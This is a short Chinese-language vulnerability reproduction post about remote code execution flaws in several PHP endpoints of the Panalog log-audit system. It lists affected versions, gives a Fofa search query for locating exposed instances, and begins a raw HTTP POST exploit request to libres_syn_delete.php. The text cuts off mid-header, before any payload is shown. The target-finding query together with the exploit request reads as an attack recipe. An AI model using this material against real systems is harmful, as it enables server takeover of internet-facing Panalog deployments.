简介
Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。
漏洞描述
Panalog 日志审计系统 libres_syn_delete.php、/sessiptbl.php、/account/sy_addmount.php、/account/sy_query.php、mailcious_down_fornode.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
影响范围
version <= MARS r10p1Free
Fofa:
app="Panabit-Panalog"
libres_syn_delete.php接口漏洞复现
POST /content-apply/libres_syn_delete.php HTTP/1.1
Host:
Cookie: PHPSESSID=tthu6vmem0toqq4ujvt00bf2q3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Re